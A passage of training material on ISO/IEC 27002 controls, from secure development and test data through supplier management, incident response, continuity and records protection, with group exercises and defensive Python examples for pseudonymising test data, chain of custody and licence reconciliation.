This process should include a risk assessment, analysis of the impacts of changes and specification of
security controls needed. This process should also ensure that existing security and control
procedures are not compromised, that support programmers are given access only to those parts of
the system necessary for their work and that formal agreement and approval for any change is
obtained.
Wherever practicable, application and operational change control procedures should be integrated
(see 12.1.2). In addition to the general provisions made within operational change procedures within
12.1.2, system change control procedures should also include provisions for:
• Maintaining a record of agreed authorization levels
• Ensuring changes are submitted by authorized users
• Reviewing security controls and integrity procedures to ensure that they will not be compromised
by the changes
• Identifying all software, information, database entities and hardware that require amendment
• Obtaining formal approval for detailed proposals before work commences and scheduling work to
avoid or minimize any disruption to the business processes involved
• Identifying and checking security critical code to minimize the likelihood of known security
weaknesses
• Ensuring authorized users accept changes prior to implementation
• Maintaining version control for all software updates and an audit trail of all change requests
• Ensuring that the system and operating documentation set is updated on the completion of each
change and that old documentation is archived or disposed of
• Testing in a segregated environment
Where automatic updates are considered, the risk to the integrity and availability of the system
should be weighed against the benefit of speedy deployment of updates. Automated updates should
not be used on critical systems as some updates can cause critical applications to fail.
14.2.3 Technical review of applications after operating platform changes
When operating platforms are changed, business critical applications should be reviewed and tested
to ensure there is no adverse impact on organizational operations or security.
When operating platforms are changed, business critical applications should be reviewed and/or
tested to ensure there is no adverse impact on organizational operations or security. Operating
platforms include operating systems, databases and middleware platforms. The control should also
be applied for changes of applications.
It is imperative that organizations communicate notifications of operating platform changes in a
timely manner to allow sufficient time to plan for adequate reviews/tests.
Reviews should include functionality of application controls and integrity procedures, to ensure that
they have not been compromised by the operating platform changes. The organization should also
ensure that changes are reflected within business continuity plans as necessary.
14.2.4 Restrictions on changes to software packages
Modifications to software packages should be discouraged, limited to necessary changes and all
changes should be strictly controlled.
Just as restriction and control is needed over the installation of operational software (see 12.6.2),
modifications to software packages should be discouraged, limited to necessary changes and all
changes should be strictly controlled.
As far as possible and practicable, vendor-supplied software packages should be used without
modification. Where a software package needs to be modified the risk of built-in controls and
integrity processes being compromised needs to be considered. The organization should establish
whether the consent of the vendor should be obtained and whether the required changes can be
obtained from the vendor as standard program updates. Future maintenance impacts and
compatibility with other software in use also need to be considered.
If changes are necessary, the original software should be retained and the changes applied to a
designated copy. A software update management process should be implemented to ensure the most
up-to-date approved patches and application updates are installed for all authorized software (see
12.6.1). All changes should be fully tested and documented, so that they can be reapplied, if
necessary, to future software upgrades. If required, the modifications should be tested and validated
by an independent evaluation body.
14.2.5 Secure system engineering principles
Principles for engineering secure systems should be established, documented, maintained and applied
to any information system implementation efforts.
Secure information system engineering procedures based on security engineering principles should be
established, documented and applied to in-house information system engineering activities. These may
be based on principles established within the security industry (e.g. NIST 800-27 Rev A), on coding
language specific principles, vendor recommendations and guidelines or can be developed by the
organization itself.
Security should be designed into all architecture layers (business, data, applications and technology)
balancing the need for information security with the need for accessibility. New technology should be
analysed for security risks and the design should be reviewed against known attack patterns.
These principles and the established engineering procedures should be regularly reviewed to ensure
that they are effectively contributing to enhanced standards of security within the engineering process.
They should also be regularly reviewed to ensure that they remain up-to-date in terms of combating
any new potential threats and in remaining applicable to advances in the technologies and solutions
being applied.
The established security engineering principles should be applied, where applicable, to outsourced
information systems through the contracts and other binding agreements between the organization and
the supplier to whom the organization outsources. The organization should confirm that the rigour of
suppliers’ security engineering principles is comparable with its own.
Application development procedures should apply secure engineering techniques in the development of
applications that have input and output interfaces. Secure engineering techniques provide guidance on
user authentication techniques, secure session control and data validation, sanitization and elimination
of debugging codes.
14.2.6 Secure development environment
Organizations should establish and appropriately protect secure development environments for system
development and integration efforts that cover the entire system development lifecycle.
The security and appropriate segregation of development and integration environments is vital to
protect the integrity and availability of live environments and ensure that vulnerabilities are not
introduced that could compromise confidentiality.
A secure development environment includes people, processes and technology associated with system
development and integration.
Organizations should assess risks associated with individual system development efforts and establish
secure development environments for specific system development efforts.
Measures required to secure and segregate development environments depend on a variety of factors:
the sensitivity of data to be processed, stored and transmitted by the system, the applicability of
external and internal requirements, controls already in place, the experience and trustworthiness of
personnel working in the environment (see 7.1.1), the degree of outsourcing associated with system
development or access required to it and control over movement of data from and to the environment.
Additional considerations should be taken in relation to the requirements for monitoring of change to
the environment and code stored therein and backup provisions (including secure offsite storage).
Once the level of protection is determined for a specific development environment, organizations
should document corresponding processes in secure development procedures and provide these to all
individuals who need them.
14.2.7 Outsourced development
The organization should supervise and monitor the activity of outsourced system development.
Organizations choosing to outsource development are able to outsource development activities but
cannot absolve themselves of the risks associated with them and remain responsible for compliance
with applicable laws and control efficiency verification.
Organizations should ensure they have their own development policy requirements to direct
outsourced development and should supervise and monitor the activity of outsourced system
development. In addition to supply relationship controls (see 15) the following considerations should
be taken in relation to outsourcing development activities:
• Licensing arrangements, code ownership and intellectual property rights related to the outsourced
content (see 18.1.2)
• Contractual requirements for secure design, coding and testing practices (see 14.2.1)
• Provision of the approved threat model to the external developer
• Acceptance testing for the quality and accuracy of the deliverables
• Provision of evidence that security thresholds were used to establish minimum acceptable levels of
security and privacy quality
• Provision of evidence that sufficient testing has been applied to guard against the absence of both
intentional and unintentional malicious content upon delivery and the presence of known
vulnerabilities
• Escrow arrangements, e.g. if source code is no longer available
• The contractual right to audit development processes and controls
• Requirements for the provision of effective documentation of the build environment used to create
deliverables.
14.2.8 System security testing
Testing of security functionality should be carried out during development.
New and updated systems require thorough security testing and verification during the development
processes, including the preparation of a detailed schedule of activities and test inputs and expected
outputs under a range of conditions. For in-house developments, such tests should initially be
performed by the development team. Independent acceptance testing should then be undertaken
(both for in-house and for outsourced developments) to ensure that the system works as expected
and only as expected (see 14.1.1 and 14.1.9). The extent of testing should be in proportion to the
importance and nature of the system.
14.2.9 System acceptance testing
Acceptance testing programs and related criteria should be established for new information systems,
upgrades and new versions.
System acceptance testing should include testing of information security requirements and adherence
to secure system development practices. The testing should also be conducted on received
components and integrated systems. Organizations can leverage automated tools, such as code
analysis tools or vulnerability scanners, and should verify the remediation of security related defects.
Testing should be performed in a realistic test environment to ensure that the system will not
introduce vulnerabilities to the organization’s environment and that the tests are reliable.
14.3 Test data
Objective: To ensure the protection of data used for testing
14.3.1 Protection of test data
Test data should be selected carefully, protected and controlled.
Test data should be selected carefully, protected and controlled, irrespective of its ownership, source
or origin.
The use of operational data containing personally identifiable information (PII) or any other
confidential information for testing purposes should be avoided wherever possible. If PII or otherwise
confidential information is used for testing purposes, all sensitive details and content should be
protected by removal or modification (see ISO/IEC 29101[26]).
Appropriate access control procedures should apply to test application systems and should reflect the
classification and sensitivity of test data and there should be separate authorization each time
operational information is copied to a test environment. The copying and use of operational
information should be logged to provide an audit trail.
Operational information should be erased from a test environment immediately after the testing is
complete.
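The 14.3.1 practices above (separate authorization for every copy, PII removed or modified before it reaches the test environment, an audit trail of each copy, and erasure once testing is complete) as an added worked example; this is not code from the course material, and the record fields, the sample records and the pseudonymisation key are constructed for illustration:

```python
"""Test-data provisioning helper illustrating ISO/IEC 27002:2013 14.3.1.
Added example; record layout, sample data and key are constructed."""
import hashlib
import hmac
import json
from dataclasses import dataclass, field
from datetime import datetime, timezone

# Constructed sample of operational records (not real people).
OPERATIONAL_RECORDS = [
    {"customer_id": 1001, "name": "A. Example", "email": "a.example@example.com",
     "phone": "+66 2 000 0001", "balance": 1250.50, "tier": "gold"},
    {"customer_id": 1002, "name": "B. Sample", "email": "b.sample@example.com",
     "phone": "+66 2 000 0002", "balance": -40.00, "tier": "silver"},
]

# How each PII field is treated before the copy reaches the test environment.
REMOVE_FIELDS = {"name", "phone"}       # dropped entirely (removal)
PSEUDONYMISE_FIELDS = {"email"}         # replaced by a keyed pseudonym (modification)
# Remaining fields (balance, tier, customer_id) are kept because tests need them.


def pseudonymise(value: str, key: bytes) -> str:
    """Replace a PII value with a stable keyed pseudonym, so tests can still
    join records on it without the original value ever entering the test copy."""
    digest = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()[:16]
    return f"user-{digest}@test.invalid"


def sanitise(record: dict, key: bytes) -> dict:
    """Apply removal/modification rules to one operational record."""
    out = {}
    for name, value in record.items():
        if name in REMOVE_FIELDS:
            continue
        out[name] = pseudonymise(str(value), key) if name in PSEUDONYMISE_FIELDS else value
    return out


@dataclass
class TestEnvironment:
    name: str
    data: list = field(default_factory=list)
    audit_log: list = field(default_factory=list)

    def _log(self, action: str, **details) -> dict:
        entry = {"ts": datetime.now(timezone.utc).isoformat(), "env": self.name,
                 "action": action, **details}
        self.audit_log.append(entry)
        return entry

    def load_operational_copy(self, records, authorization_ref, requested_by, key) -> int:
        """Copy operational data into the test environment. A fresh authorization
        reference is required for every copy; the copy is logged (14.3.1)."""
        if not authorization_ref:
            raise PermissionError("separate authorization is required for each copy")
        self.data = [sanitise(r, key) for r in records]
        self._log("copy", authorization=authorization_ref, requested_by=requested_by,
                  source_records=len(records), fields_removed=sorted(REMOVE_FIELDS),
                  fields_pseudonymised=sorted(PSEUDONYMISE_FIELDS))
        return len(self.data)

    def erase(self, requested_by) -> int:
        """Erase operational-derived data immediately after testing, and log it."""
        count = len(self.data)
        self.data = []
        self._log("erase", requested_by=requested_by, records_erased=count)
        return count

    def contains_original_pii(self, records) -> bool:
        """Check that no original PII value survives anywhere in the test copy."""
        originals = {str(r[f]) for r in records
                     for f in REMOVE_FIELDS | PSEUDONYMISE_FIELDS if f in r}
        blob = json.dumps(self.data)
        return any(v in blob for v in originals)


def copy_refused_without_authorization(env, records, key) -> bool:
    """True if the environment rejects a copy that carries no authorization."""
    try:
        env.load_operational_copy(records, "", "tester", key)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    key = b"constructed-pseudonym-key"
    env = TestEnvironment("uat-1")
    env.load_operational_copy(OPERATIONAL_RECORDS, "CHG-0001", "tester", key)
    print(json.dumps(env.data, indent=2))
    env.erase("tester")
    print(json.dumps(env.audit_log, indent=2))
```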
15.1 Information security in supplier relationships
Objective: To ensure protection of the organization’s assets that are accessible by suppliers.
Many organizations use suppliers or other third parties (e.g. for sales and distribution) to achieve
business objectives and the outsourcing of previously internal processes is now commonplace. In
such an environment, information is being directly shared with third parties and/or they may have
access to networks and systems which store or transport such information. The information security
risks arising from the use of suppliers and other third parties need to be understood and appropriate
responses to the identified risks applied.
15.1.1 Information security policy for supplier relationships
Information security requirements for mitigating the risks associated with supplier’s access to the
organization’s assets should be agreed with the supplier and documented.
Once the risks associated with the use of third parties are understood, controls need to be identified,
agreed with each supplier (different suppliers may represent different risks and so the controls
selected may not always be the same) and documented within a policy to ensure consistency.
Organizations should ensure they identify the types of suppliers that are likely to have access to their
information and manage the relationship across the lifecycle, from identifying the need for a
supplier’s service or product commodity through due diligence and contracting, transition, business as
usual, change and exit. Through the lifecycle, a number of further controls are applied such as
providing awareness training to the supplier’s staff on information security requirements of the
organization, and performing control assurance and testing activities on the supplier’s adherence to
policies.
15.1.2 Addressing security within supplier agreements
All relevant information security requirements should be established and agreed with each supplier
that may access, process, store, communicate, or provide IT infrastructure components for, the
organization’s information.
Depending on the nature of the service or product procured and the relative negotiating strengths of
customer and supplier, the nature of the agreement to procure services can vary from a simple
purchase order with standardized (and often shortened) terms and conditions to master service
agreements (MSAs) with multiple services being delivered by a supplier to different parts of an
organization. It is also common that services may be procured on (negotiated) supplier terms,
especially cloud services. In this context, it is important that the organization’s interests are protected
and clear requirements are documented for inclusion in the agreement. Many organizations look to
ensure that the type of agreement chosen reflects the risk to the organization, e.g. services involving
personally identifiable information are not procured via a purchase order as the terms are
insufficiently detailed. In addition to requiring compliance with the organization’s information security
requirements, contract clauses and schedules will typically consider:
• Rights to audit
• Rights to agree selection and changes to subcontractors
• Rights to approve changes in service delivery model (e.g. supplier may want to move service
delivery offshore)
• Incident disclosure and support
• Legal and regulatory requirements
• Return and disposal of data at exit
15.1.3 Information and communication technology supply chain
Agreements with suppliers should include requirements to address the information security risks
associated with information and communications technology services and product supply chain.
Issues can often originate from deeper in the supply chain than the immediate supplier with which
the organization holds a contractual relationship. There is a specific need to consider information and
communication technology supply chains where hardware and software products may carry
vulnerabilities or lose manufacturer support, if not well managed. This also applies to Cloud services
where the supply chain may be four or five layers deep. Therefore, it is important to map out key
supply chains and identify product and service components and the risk presented. The tier one
supplier needs to be held to account for the security of its supply chain. For high risk supply chains,
the right to audit supply chain participants directly is worth considering.
15.2 Supplier service delivery management
Objective: To maintain an agreed level of information security and service delivery in line with supplier
agreements.
15.2.1 Monitoring and review of supplier services
Organizations should regularly monitor, review and audit supplier service delivery.
Monitoring and review of supplier service delivery is common practice from a performance against service
level agreements perspective. This monitoring needs to include information security requirements as well.
Building information security reviews into existing operational and commercial governance helps to drive an
integrated approach towards the supplier and ensure top management awareness and engagement in risks
and issues arising from non-performance. Security incidents, audit reports (independent and internal)
should be used to inform a view of control effectiveness.
15.2.2 Managing changes to supplier services
Changes to the provision of services by suppliers, including maintaining and improving existing information
security policies, procedures and controls, should be managed, taking account of the criticality of business
information, systems and processes involved and re-assessment of risks.
Changes in aspects of the service or product commodity supplied during the term of the agreement with a
supplier are quite common. Change may be initiated by the supplier or the organization. It is important that,
at the point of identifying a need to change, the information security requirements are reviewed for
adequacy and modified as appropriate before the change is implemented, to avoid exposing the organization
to unacceptable risks. Typical changes to consider include:
• Change to the physical location of service facilities
• Change in subcontractor
• Additional, new services being awarded to the supplier
• Introduction of new systems to support delivery of the service
• New regulatory requirements
Activity 8: Supplier relationships
Purpose: Create a supplier risk questionnaire.
Duration:
25 minutes in groups
15 minutes feedback and discussion
Directions:
ABC Organization Ltd has identified that it does not know what level of information security risk it is
exposed to through the procurement of various goods and services from third parties. As such, it has
decided to conduct risk assessments on all its current third party suppliers. As a first step, it has
decided to send a high-level information security questionnaire to all of its suppliers.
On a flipchart, devise ten questions that could be used to provide a high level assessment of the level
of risk posed by the suppliers of goods and services to ABC Organization Ltd.
Be prepared to explain the purpose and benefits of your questions.
The tutor will then lead a discussion regarding the questions the groups have produced and why they
are felt to be important from an information security perspective.
16.1 Management of information security incidents and improvements
Objective: To ensure a consistent and effective approach to the management of information security
incidents, including communication on security events and weaknesses.
Information security incidents can bring significant disruption to business operations and harm the
reputation of the organization. Developing the capability to consistently and effectively detect, report,
assess, respond to, deal with and learn from information security incidents is therefore essential.
16.1.1 Responsibilities and procedures
Management responsibilities and procedures should be established to ensure a quick, effective and
orderly response to information security incidents.
Effective response requires management to understand its role and responsibilities in leading the
incident management team. A number of procedures need to be established and validated in advance
to provide assurance of likely effectiveness of any response. These procedures should cover the
following:
• Incident response planning and preparation
• Monitoring, detecting, analysing and reporting of information security events and incidents
• Logging of incident management activities
• Handling of forensic evidence
• Assessment of and decision on information security events and assessment of information security
weaknesses
• Response including for escalation, controlled recovery from an incident and communication to
internal and external people or organizations
• Reporting procedures
16.1.2 Reporting information security events
Information security events should be reported through appropriate management channels as quickly
as possible.
Once the reporting procedures are agreed and signed-off, then employees and contractors need to
be made aware of their responsibility to report information security events as quickly as possible and
to the right channel. Information security events have been defined in ISO 27000 as:
‘…identified occurrence of a system, service or network state indicating a possible breach of
information security policy or failure of safeguards, or a previously unknown situation that may be
security relevant’ (ISO 27000:2012, Clause 2.31)
Example events include observation of ineffective security controls, breaches of information
availability expectations, access violations or malfunctions of software.
16.1.3 Reporting information security weaknesses
Where employees or contractors identify an information security weakness then this should be
recorded and reported through the correct channels as identified in the procedures for reporting.
Employees and contractors should resist any temptation to confirm the weakness by taking any
unilateral action and this should be made clear in the procedures and in the communication around
the procedures.
16.1.4 Assessment of and decision on information security events
Information security events should be assessed and it should be decided if they are to be classified as
information security incidents.
A reported information security event needs to be assessed against an agreed set of criteria to
determine whether it should be classified as an incident and an appropriate level of priority assigned.
The classification and priority assigned reflect the likely impact and velocity of the incident.
16.1.5 Response to information security incidents
Information security incidents should be responded to in accordance with the documented
procedures.
The response to the information security incident is built around the need to resume expected
security levels within target timeframes to prevent further harm. A recovery phase will follow, e.g.
cleaning of infected systems, restoring of backups to clean production systems etc.
The response needs to ensure that the right people are brought together, including suppliers that
may be providing managed security services, for example, as part of the incident management team.
In addition to procedures to deal with the information security weaknesses found to cause or
contribute to the incident, there are a number of steps that need to be included within response procedures:
• Collection of evidence as soon as possible after the incident is confirmed
• Escalation procedures to more senior levels of management depending on the expected impact of
the incident and need for external communication and stakeholder management
• Communicating the existence of the incident to external people or organizations with a need to
know, e.g. regulators, customers
• Once the incident has been successfully addressed, logged and the incident team stood down, it is
necessary to perform post incident analysis to identify the root cause(s) of the incident
16.1.6 Learning from information security incidents
Knowledge gained from analysing and resolving information security incidents should be used to
reduce the likelihood or impact of future incidents.
Post incident analysis provides the organization with a learning opportunity to reduce the likelihood or
impact of the incident re-occurring. It is important the analysis includes assessment of internal and
external costs as well as reputational impact and any fines arising from compliance breaches. The
consequences of some incidents may take time to become obvious, e.g. loss of sales at contract
renewal. These evaluations provide the business case for appropriate investments to mitigate future
similar events. Additionally, they can be used as internal case studies to raise awareness of the
incidents that may arise if staff and contractors do not follow procedures or the organization fails in
its incident response.
16.1.7 Collection of evidence
The organization should define and apply procedures for the identification, collection, acquisition and
preservation of information, which can serve as evidence.
As with any good police drama, the timely and safe collection of evidence is key to successful analysis
of incidents and may be required in the event of an eventual prosecution. Procedures need to be
defined that support the processes of identification, collection, acquisition and preservation of
evidence considering factors such as chain of custody, safety and competency of personnel and
documentation.
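The identification, acquisition and preservation steps above, with chain of custody and documentation, as an added worked example (not code from the course material): each item is fingerprinted with SHA-256 at acquisition, every hand-over is appended to a hash-chained custody log, and verification re-checks both the evidence and the log, so a silent change to either is detected. The case reference, names and evidence bytes are constructed for illustration.

```python
"""Minimal chain-of-custody record for an acquired evidence item (16.1.7).
Added example; case reference, people and evidence content are constructed."""
import hashlib
import json
from datetime import datetime, timezone

# Constructed sample evidence: a log excerpt collected from a host.
CONSTRUCTED_EVIDENCE = (
    b"2017-11-01T09:12:03Z host01 sshd: Accepted password for svc from 10.0.0.5\n"
)

GENESIS = "0" * 64  # prev_entry_hash of the first custody entry


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def entry_digest(entry: dict) -> str:
    """Hash of a custody entry excluding its own entry_hash field."""
    body = {k: v for k, v in entry.items() if k != "entry_hash"}
    return sha256_hex(json.dumps(body, sort_keys=True).encode())


class EvidenceItem:
    def __init__(self, case_ref, item_id, description, data: bytes, collected_by):
        self.case_ref = case_ref            # identification
        self.item_id = item_id
        self.description = description
        self.data = data                    # acquisition (image/copy of the item)
        self.acquisition_hash = sha256_hex(data)   # preservation fingerprint
        self.custody = []
        self._append("acquired", collected_by, None)

    def _append(self, action, person, note) -> dict:
        prev = self.custody[-1]["entry_hash"] if self.custody else GENESIS
        entry = {
            "seq": len(self.custody),
            "ts": datetime.now(timezone.utc).isoformat(),
            "case_ref": self.case_ref,
            "item_id": self.item_id,
            "action": action,
            "person": person,
            "note": note,
            "item_hash": self.acquisition_hash,
            "prev_entry_hash": prev,
        }
        # Chain each entry to the previous one so entries cannot be edited,
        # reordered or dropped without breaking verification.
        entry["entry_hash"] = entry_digest(entry)
        self.custody.append(entry)
        return entry

    def transfer(self, from_person, to_person, note=None) -> dict:
        """Document a hand-over; both parties are named in the custody entry."""
        return self._append("transfer", f"{from_person}->{to_person}", note)

    def verify(self):
        """Return (evidence_intact, log_intact)."""
        evidence_ok = sha256_hex(self.data) == self.acquisition_hash
        prev = GENESIS
        for i, e in enumerate(self.custody):
            if (e["seq"] != i or e["prev_entry_hash"] != prev
                    or e["item_hash"] != self.acquisition_hash
                    or entry_digest(e) != e["entry_hash"]):
                return evidence_ok, False
            prev = e["entry_hash"]
        return evidence_ok, True


if __name__ == "__main__":
    item = EvidenceItem("CASE-EXAMPLE-1", "E1", "sshd log excerpt",
                        CONSTRUCTED_EVIDENCE, "first responder")
    item.transfer("first responder", "forensic analyst", "sealed bag #1")
    print(json.dumps(item.custody, indent=2))
    print("evidence intact, log intact:", item.verify())
```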
17.1 Information security continuity
Objective: Information security continuity should be embedded in the organization’s business
continuity management systems.
Business continuity is defined in ISO/IEC 22301:2012 as the capability of the organization to continue
delivery of products or services at acceptable predefined levels following a disruptive incident. In the
context of continuity of information security this means identifying the time-criticality of information
security controls to determine the priority of their recovery when the organization is affected by a
disruptive incident. The risk is that in times of crisis and stress, workaround procedures and ‘short
cuts’ may come into effect which may mean that required controls are not fully applied without
appropriate governance.
In organizations such as retail banks, information security management controls may have ‘always
on’ requirements to match the nature of 24x7x365 online banking requirements, while requirements
at branches may only need to align with opening hours at the branch.
17.1.1 Planning information security continuity
The organization should determine its requirements for information security and the continuity of
information security management in adverse situations, e.g. during a crisis or disaster.
Where an organization has an existing business continuity management system (BCMS) then
information security continuity requirements should be documented as part of the business impact
analysis phase and become an integrated part of the management system. Where organizations do
not have a BCMS, then a business impact analysis should be completed and availability requirements
determined for specified controls. In some organizations, the IT Disaster Recovery Plans could be
extended to cover information security management continuity. It should also be noted that during
certain incidents, confidentiality and integrity related controls may be overlooked (e.g. unauthorized
access may be gained because fire doors are open). Organizations should consider these types of
weaknesses when planning
business continuity processes and include suitable mitigating controls within the plans where
necessary (the organization should determine the degree to which it is prepared to accept the
heightened levels of risk presented by such weaknesses and agree controls accordingly).
17.1.2 Implementing information security continuity
The organization should establish, document, implement and maintain processes, procedures and
controls to ensure the required level of continuity for information security during an adverse situation.
As with security incident management (16.1.5), business continuity management sets out procedures
for effective response to disruptive incidents across a wide range of potential incident scenarios and
mandates that documented plans, response and recovery procedures are developed and approved.
These plans and procedures detail how the organization will manage a disruptive event and maintain
its information security to a predetermined level agreed with top management. As part of continuity
planning, the organization should consider its options when existing information security controls
cannot be maintained and alternative controls need to be applied until recovery is effected.
17.1.3 Verify, review and evaluate information security continuity
The organization should verify the established and implemented information security continuity
controls at regular intervals in order to ensure that they are valid and effective during adverse
situations.
Plans can provide a false sense of assurance unless they have been tested and regularly reviewed
and updated to reflect the organization and its requirements. Whether the information security
management plans are standalone or part of wider business continuity and IT Disaster Recovery
plans, there is a need to test the plans through exercising to ensure they are likely to be effective.
Exercises can range from discussion-based plan walkthroughs and scenario-driven workshops
through to live exercises.
Organizations are subject to change and new controls may be required while older ones are retired,
so it is necessary to update business impact analysis and review plans for currency.
17.2 Redundancies
Objective: To ensure availability of information processing facilities.
17.2.1 Availability of information processing facilities
Information processing facilities should be implemented with redundancy sufficient to meet
availability requirements.
In addition to considering the availability of information security controls, business continuity
requirements apply to protecting the availability of information systems. Based on the availability
requirements identified through business impact analysis, technical and architectural options will be
considered to maintain required availability levels. Introducing redundancy is seen as an effective
response to secure high availability but introduces additional cost. Testing of redundancy, e.g. failover
of live to back-up, needs to be part of the validation of continuity arrangements but needs to be
carefully managed to avoid disruption to the business.
Activity 9: Incident management
Purpose: To analyse the nature, impact and response to an information security incident
Duration:
30 minutes in groups
10 minutes feedback
Directions:
The IT Operations Manager has received a telephone call from a member of the public who claims to
have bought a laptop from an online auction site and that the laptop belongs to ABC Organization.
This has been determined through an asset tag located on the bottom of the laptop and when the
laptop is booted, the screensaver shows the ABC company logo and the local folders seem to have a
number of documents within them that could possibly be confidential. The caller has agreed to return
the laptop to ABC in return for reimbursement of what he paid for the laptop.
The standard business process for disposal of assets requires that a specialist third party is used to
either repurpose viable devices or destroy non-viable ones. Viable devices are required to have hard
drives securely wiped before being disposed of.
The class will be split into three groups and the tutor will facilitate a discussion whereby each group
will take it in turn to decide the order of events in order to address the following:
• Determining how the incident occurred in the first place
• Determining the impact of the incident and what steps can be taken to minimise any adverse
consequences
• Determining what can be done to ensure the incident cannot happen again
18.1 Compliance with legal and contractual requirements
Objective: To avoid breaches of legal, statutory, regulatory or contractual obligations related to
information security and of any security requirements.
18.1.1 Identification of applicable legislation and contractual requirements
All relevant legislative, statutory, regulatory and contractual requirements and the organization’s approach
to meet these requirements should be explicitly identified, documented and kept up to date for each
information system and the organization.
Organizations should ensure that they identify the legislation with which they need to comply and
also identify and implement the related controls required to enable such compliance. These controls
and their associated responsibilities should be formally documented. It is also important for those
organizations that operate internationally to ensure that they identify and comply with all applicable
legislation within all of the jurisdictions within which it operates. Those organizations that are subject
to industry and other related regulation should similarly identify them and implement the related
controls (again internationally if appropriate). One area which tends to get overlooked is related to
contractual requirements. Many organizations simply don’t know if they have obligations to provide
certain levels of protection for certain types of information or for other specific controls to be
implemented based on the contractual requirements of customers and other third parties. Processes
should be implemented to ensure that all information security controls required by contract are
identified, no matter who within the organization is authorized to enter into such contracts.
18.1.2 Intellectual property rights
Appropriate procedures should be implemented to ensure compliance with legislative, regulatory and
contractual requirements related to intellectual property rights and use of proprietary software
products.
In many jurisdictions around the world, intellectual property is protected by legislation, so this legislation
should be identified and complied with in line with the requirements outlined in 18.1.1 above. There
may also be regulatory and contractual reasons for doing so. There are many opportunities within
many organizations to be non-compliant with this legislation or with contractual or regulatory
requirements as the IP of others is so easy to come across, for example when sourcing images to use
in a slideshow presentation by using internet search engines or through photocopying magazine
articles and other publications for use within projects or through the use of proprietary software
which may need a license to be used, especially within a commercial environment.
Organizations should ensure that suitable procedures are implemented for the use of such materials
based on a documented policy which clearly sets out when, where and how such material can be
used. Many organizations inadvertently become non-compliant simply because they obtain material
from sources that are untrustworthy. Processes should be implemented to ensure that images, music,
video, software and other proprietary material are sourced from reputable vendors so that any license
fees are determined and paid. Organizations should ensure they maintain an inventory of such
material and how many users are using it so that it can, if necessary, evidence the fact that it has
sufficient license to use the material. Reviews should be regularly conducted to ensure that no
unauthorized copies of such material exist. Procedures should be in place to ensure that where
unauthorized software or other material is identified, the appropriate license is obtained or the
material removed. Links should also be made between the documented policy and the organization’s
disciplinary process so that offenders can be dealt with as copyright infringement can lead to legal
action which may result in fines for the organization and even in some cases criminal proceedings.
The importance of protecting intellectual property, and the associated responsibilities, should be communicated
effectively to all persons doing work under the control of the organization.
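The inventory-and-review step described above can be automated as a simple reconciliation of licences held against installations found. The following Python sketch is an added illustration, not part of the BSI course material; the product names, seat counts and host names are constructed sample data.

```python
from collections import Counter, defaultdict
from dataclasses import dataclass

# Constructed licence register: product -> number of seats the organization holds.
ENTITLEMENTS = {"OfficeSuite Pro": 50, "PhotoEditor": 5, "CADStation": 2}

# Constructed output of a software inventory sweep: one (host, product) pair per installation.
INSTALLATIONS = [
    ("ws-001", "OfficeSuite Pro"), ("ws-002", "OfficeSuite Pro"), ("ws-003", "OfficeSuite Pro"),
    ("ws-001", "PhotoEditor"), ("ws-002", "PhotoEditor"), ("ws-004", "PhotoEditor"),
    ("ws-005", "PhotoEditor"), ("ws-006", "PhotoEditor"), ("ws-007", "PhotoEditor"),
    ("ws-010", "CADStation"),
    ("ws-011", "VideoCutter"), ("ws-012", "VideoCutter"),
]


@dataclass(frozen=True)
class Finding:
    product: str
    installed: int
    licensed: int
    hosts: tuple   # where the copies were found, so the review can act on them
    action: str    # the two outcomes the control allows: obtain a licence or remove the material


def reconcile(entitlements, installations):
    """Compare installed copies with licences held and return one finding for every
    product that is deployed beyond its entitlement or has no entitlement at all."""
    installed = Counter(product for _host, product in installations)
    hosts_by_product = defaultdict(list)
    for host, product in installations:
        hosts_by_product[product].append(host)

    findings = []
    for product, count in sorted(installed.items()):
        licensed = entitlements.get(product, 0)
        if count <= licensed:
            continue  # within entitlement: the inventory itself is the evidence of sufficient licence
        action = "remove material" if licensed == 0 else "obtain licence or remove excess"
        findings.append(Finding(product, count, licensed,
                                tuple(sorted(hosts_by_product[product])), action))
    return findings


def headroom(entitlements, installations):
    """Spare seats per licensed product; a negative number means over-deployed."""
    installed = Counter(product for _host, product in installations)
    return {p: n - installed.get(p, 0) for p, n in entitlements.items()}
```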
18.1.3 Protection of records
Records should be protected from loss, destruction, falsification, unauthorized access and
unauthorized release, in accordance with legislative, regulatory, contractual and business
requirements.
Organizations will generate lots of different records for lots of different business processes. These
records should be categorized into different record types such as transaction logs, database records,
accounting records, audit logs etc. The importance of these different records should be determined
and suitable controls put in place to protect them. Records should be classified in line with the
organization’s information classification scheme to enable appropriate controls to be selected. Rules
should be determined for records with different classifications and should include retention periods
and the type of media on which the record should be stored. Suitable controls should be implemented to
ensure that, whatever the retention period defined and whatever storage media selected, the
records are not subject to deterioration, so that they can still be relied upon as evidence when
needed. Storage and handling requirements, especially those determined by manufacturers of media,
should therefore be adhered to. Where the storage medium is electronic, specific consideration should
be given to ensuring that changes in technology do not lead to the information eventually being
irretrievable because the media is no longer supported.
A retention schedule should be drawn up to ensure that records are only retained for the permissible
amount of time and an inventory of where the records are held should also be drawn up to enable
easy and timely access.
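The checks that 18.1.3 asks for (retention period, approved and still-supported media, and a known storage location for every record) can be run over a records inventory. This Python example is added here and is not part of the BSI course material; the record types, retention periods, media names and inventory entries are constructed for illustration.

```python
from dataclasses import dataclass
from datetime import date, timedelta

# Constructed retention rules keyed by record type: how long the record must be
# kept (in days) and which storage media are approved for it.
RETENTION_RULES = {
    "audit log":         {"days": 365,     "media": {"online", "tape"}},
    "accounting record": {"days": 7 * 365, "media": {"online", "tape", "paper"}},
    "transaction log":   {"days": 90,      "media": {"online"}},
}

# Media the organization can still read today; anything else is an obsolescence risk.
SUPPORTED_MEDIA = {"online", "tape", "paper"}


@dataclass(frozen=True)
class Record:
    record_id: str
    record_type: str
    created: date
    medium: str
    location: str  # where the record is held; this is the inventory the control calls for


@dataclass(frozen=True)
class Issue:
    record_id: str
    problem: str


# Constructed inventory entries, as a records register might hold them.
SAMPLE_RECORDS = [
    Record("R1", "audit log", date(2017, 1, 1), "online", "siem-01"),
    Record("R2", "transaction log", date(2017, 6, 1), "online", "db-02"),
    Record("R3", "accounting record", date(2010, 3, 15), "zip disk", "archive room"),
    Record("R4", "audit log", date(2017, 9, 1), "tape", ""),
    Record("R5", "email", date(2017, 10, 1), "online", "mail-01"),
]


def review_records(records, rules=RETENTION_RULES, supported_media=SUPPORTED_MEDIA,
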